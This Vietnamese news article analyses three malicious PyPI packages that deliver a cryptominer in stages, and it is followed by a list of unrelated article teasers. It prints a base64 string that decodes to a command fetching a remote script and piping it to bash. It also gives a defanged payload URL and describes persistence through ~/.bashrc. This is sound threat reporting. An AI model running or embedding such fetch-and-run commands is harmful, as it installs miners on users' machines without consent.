Ba gói có hại được đặt tên là moduleseven-1.0, driftme-1.0 và catme-1.0. Tất cả chúng đều bắt nguồn từ cùng một nhà phát triển, được gọi là sastra (Hình 1), người đã tạo tài khoản PyPI ngay trước khi tải gói độc hại đầu tiên lên.
Hình 1. Tài khoản PyPI của nhà phát triển sastra
Giai đoạn tấn công
Tất cả các gói này đều thể hiện một phương pháp tấn công chung, vì vậy các nhà nghiên cứu FortiGuard đã sử dụng driftme-1.0 làm ví dụ để minh họa các giai đoạn của cuộc tấn công. Tương tự cách tiếp cận của gói Culturestreak trước đó, ba gói độc hại mới này che giấu payload của chúng, làm giảm khả năng phát hiện mã độc một cách hiệu quả bằng cách lưu trữ trên một địa chỉ URL từ xa. Sau đó, payload này sẽ được phân phối dần theo nhiều giai đoạn khác nhau để thực hiện các hoạt động độc hại. Hoạt động này được kích hoạt bởi câu lệnh “import” trong tệp __init__.py (Hình 2).
Hình 2. Câu lệnh import trong tệp driftme-1.0/driftme/__init__.py
Mô-đun processor.py chứa giai đoạn đầu tiên của payload độc hại (Hình 3).
.png)
Hình 3. Mô-đun processor.py
Bằng cách gọi hàm processing(), gói độc hại sẽ giải mã chuỗi sau “Y3VybCBodHRwczovL3BhcGljdWxvLm5ldC91bm1pLnNoIHwgYmFzaA==” vào lệnh shell để tìm nạp nội dung từ URL đã chỉ định bằng cách sử dụng Curl. Sau đó, chuyển nội dung này trực tiếp tới Bash shell, thực thi đoạn tập lệnh (script) như Hình 4.
Hình 4. Chuỗi base64 được giải mã
Các nhà nghiên cứu nhận thấy rằng tập lệnh unmi.sh chứa giai đoạn thứ hai của payload độc hại (Hình 5).
Hình 5. Tập lệnh unmi.sh
Bằng cách sử dụng tập lệnh unmi.sh, kẻ tấn công tải hai mục quan trọng xuống thiết bị của người dùng: Đầu tiên là “config.json”, một tệp cấu hình cần thiết để thực thi chương trình sẽ được cài đặt. Tệp này phác thảo cài đặt khai thác tiền điện tử. Cụ thể, nó xác định thuật toán khai thác, tức là RandomX, cài đặt tài nguyên thiết bị cho hoạt động khai thác và các nhóm khai thác (pool mining) được chỉ định cùng với tài khoản ví của người thụ hưởng. Đáng chú ý, kẻ tấn công đã chọn tắt tính năng “init-avx2” để đảm bảo khả năng tương thích với các thiết bị cũ hơn.
Hình 6. Cài đặt thuật toán khai thác và tài nguyên thiết bị
Hình 7. Cài đặt cho nhóm khai thác
Thành phần quan trọng thứ hai của payload là tệp thực thi CoinMiner. Tương tự như tệp cấu hình, tệp thực thi này cũng được lưu trữ tại địa chỉ “hxxps://gitlab.com/ajo9082734/Mine/-/raw/main/X”. Sau khi tệp thực thi được tải xuống từ URL từ xa và được đánh dấu là có thể thực thi, kẻ tấn công sử dụng lệnh “nohup” để thực thi nó trong nền và đảm bảo rằng tất cả các sửa đổi này đều được thêm vào tệp ~/.bashrc, nhằm kích hoạt lại hoạt động độc hại này bất cứ khi nào người dùng bắt đầu phiên Bash shell mới.
Tệp ELF CoinMiner được truy xuất trong quá trình này không phải là tệp mới đối với cộng đồng bảo mật. Ban đầu nó được tải lên VirusTotal vào năm 2021. Hiện tại, một số lượng đáng kể các công cụ bảo mật trên VirusTotal phát hiện ra payload là độc hại.
Hình 8. Kết quả quét của VirusTotal cho tệp thực thi được tải về
Sự tương đồng với gói Culturestreak
Như đã đề cập, ba gói PyPI độc hại trong bài viết này có thông tin IoC tương tự với chiến dịch tấn công tiền điện tử tận dụng gói Python lừa đảo có tên là Culturestreak, bao gồm:
- Tệp cấu hình để chạy tệp thực thi được lưu trữ trên tên miền “papiculo[.]net”.
- Các tệp thực thi khai thác tiền điện tử được lưu trữ trên GitLab công khai. Mặc dù tài khoản lưu trữ tệp độc hại trên blog của Aldri Terakhir (@aldriterakhir, ID người dùng: 12350673) đã bị chặn vào thời điểm ba mẫu PyPI mới được công bố, có thể chính tác nhân độc hại đó đã di chuyển tất cả nội dung từ tài khoản này sang tài khoản mới là Zela Najo (@zelanajo, ID người dùng: 15638540).
Hình 9. Tệp độc hại chính của gói Culturestreak có nhiều điểm đáng ngờ hơn so với gói driftme
Ba gói độc hại này khi so sánh với Culturestreak thể hiện các chiến lược nâng cao trong việc che giấu sự hiện diện và duy trì các chức năng độc hại của chúng. Một cải tiến quan trọng là việc giới thiệu một giai đoạn bổ sung, trong đó các lệnh quan trọng cho các hoạt động độc hại được lưu trữ trong tệp unmi.sh trên máy chủ từ xa. Chiến thuật này cải thiện khả năng tránh bị phát hiện bởi các giải pháp bảo mật bằng cách giảm thiểu mã trong gói PyPI. Nó cũng cho phép tiết lộ mã độc một cách có kiểm soát hơn bằng cách vô hiệu hóa máy chủ lưu trữ tập lệnh unmi.sh này.
Hơn nữa, các gói này chèn các lệnh độc hại vào tệp ~/.bashrc để đảm bảo tính tồn tại và kích hoạt lại của phần mềm độc hại trên thiết bị của người dùng, kéo dài thời gian hoạt động bí mật của nó một cách hiệu quả.
Kết luận
Một xu hướng đáng chú ý mà các nhà nghiên cứu quan sát được từ ba gói cụ thể này là các tác nhân độc hại liên tục tinh chỉnh các chiến lược của chúng nhằm che giấu và kéo dài quá trình khai thác. Một chiến thuật quan trọng được đề cập trong bài vết này bao gồm việc chia nhỏ toàn bộ quy trình làm việc độc hại thành các giai đoạn nhỏ hơn và phân phối chung theo từng gian đoạn.
Điều này như một lời nhắc nhở về tầm quan trọng đặc biệt của việc xem xét kỹ lưỡng mã nguồn và gói có nguồn gốc chưa được xác minh hoặc đáng ngờ, đồng thời luôn cập nhật thông tin đầy đủ về các mối đe dọa tiềm ẩn.
Trần Bắc
(Tổng hợp)
09:00 | 10/01/2024
08:00 | 10/02/2024
14:00 | 19/02/2024
10:00 | 15/12/2022
10:00 | 15/09/2023
10:00 | 28/08/2023
Trước đây đã có những quan điểm cho rằng MacBook rất khó bị tấn công và các tin tặc thường không chú trọng nhắm mục tiêu đến các dòng máy tính chạy hệ điều hành macOS. Một trong những nguyên do chính xuất phát từ các sản phẩm của Apple luôn được đánh giá cao về chất lượng lẫn kiểu dáng thiết kế, đặc biệt là khả năng bảo mật, nhưng trên thực tế MacBook vẫn có thể trở thành mục tiêu khai thác của các tin tặc. Mặc dù không bị xâm phạm thường xuyên như máy tính Windows, tuy nhiên đã xuất hiện nhiều trường hợp tin tặc tấn công thành công vào MacBook, từ các chương trình giả mạo đến khai thác lỗ hổng bảo mật. Chính vì vậy, việc trang bị những kỹ năng an toàn cần thiết sẽ giúp người dùng chủ động nhận biết sớm các dấu hiệu khi Macbook bị tấn công, đồng thời có những phương án bảo vệ hiệu quả trước các mối đe dọa tiềm tàng có thể xảy ra.
15:00 | 04/08/2023
Trong bối cảnh sự phát triển mạnh mẽ của các công nghệ ngày càng được ứng dụng trong hoạt động sản xuất, cùng với ngành công nghiệp dần được chuyển sang tự động hóa, công nghệ thông tin (Information Technology - IT) và công nghệ vận hành (Operational Technology - OT) đang có những bước chuyển mình tích cực. Tuy nhiên, dường như các doanh nghiệp mới chỉ tập trung phát triển một trong hai nền tảng trên, mà chưa chú trọng đến kết hợp, hội tụ cùng một môi trường sản xuất công nghiệp hiện đại. Bài báo sẽ đưa ra các lợi ích của sự hội tụ của hai hệ thống IT và OT.
07:00 | 08/02/2023
Với sự phát triển không ngừng của công nghệ, những cuộc tấn công mạng thông qua mạng Internet cũng ngày càng trở nên đa dạng hơn. Đặc biệt là hoạt động trò chơi trực tuyến tiềm ẩn không ít những mối đe dọa bị tấn công bởi mã độc. Bài báo này sẽ đưa ra các mối đe dọa liên quan đến trò chơi trực tuyến, phân tích các phương thức, thủ đoạn mà tin tặc tấn công mạng dựa vào các trò chơi trực tuyến, từ đó đưa ra một số giải pháp phòng tránh.
16:00 | 30/11/2022
Trong phần I của bài báo, nhóm tác giả sẽ giới thiệu cách thức xây dựng bộ dữ liệu IDS2021-WEB trích xuất từ bộ dữ liệu gốc CSE-CIC-IDS2018. Theo đó, các bước tiền xử lý dữ liệu được thực hiện từ bộ dữ liệu gốc như lọc các dữ liệu trùng, các dữ liệu dư thừa, dữ liệu không mang giá trị. Kết quả thu được là một bộ dữ liệu mới có kích thước nhỏ hơn và số lượng thuộc tính ít hơn. Đồng thời, đề xuất mô hình sử dụng bộ dữ liệu về xây dựng hệ thống phát hiện tấn công ứng dụng website.
08:00 | 11/01/2024 | Chính sách - Chiến lược
09:00 | 10/01/2024 | Giải pháp khác
09:00 | 05/01/2024|Chính sách - Chiến lược
09:00 | 05/01/2024|An ninh – Quốc Phòng
Lược đồ chữ ký số dựa trên hàm băm là một trong những lược đồ chữ ký số kháng lượng tử đã được Viện Tiêu chuẩn và Công nghệ Quốc gia Mỹ (NIST) chuẩn hóa trong tiêu chuẩn đề cử FIPS 205 (Stateless Hash Based Digital Signature Standard) vào tháng 8/2023. Bài báo này sẽ trình bày tổng quan về sự phát triển của của lược đồ chữ ký số dựa trên hàm băm thông qua việc phân tích đặc trưng của các phiên bản điển hình của dòng lược đồ chữ ký số này.
09:00 | 01/04/2024
Không chỉ tác động đến lĩnh vực an toàn thông tin, Bug Bounty còn được cho là cổ vũ cho nền kinh tế Gig Economy kiểu Orwell. Điều này có là một góc nhìn tiêu cực cho hình thức bảo mật này?
09:00 | 28/04/2024
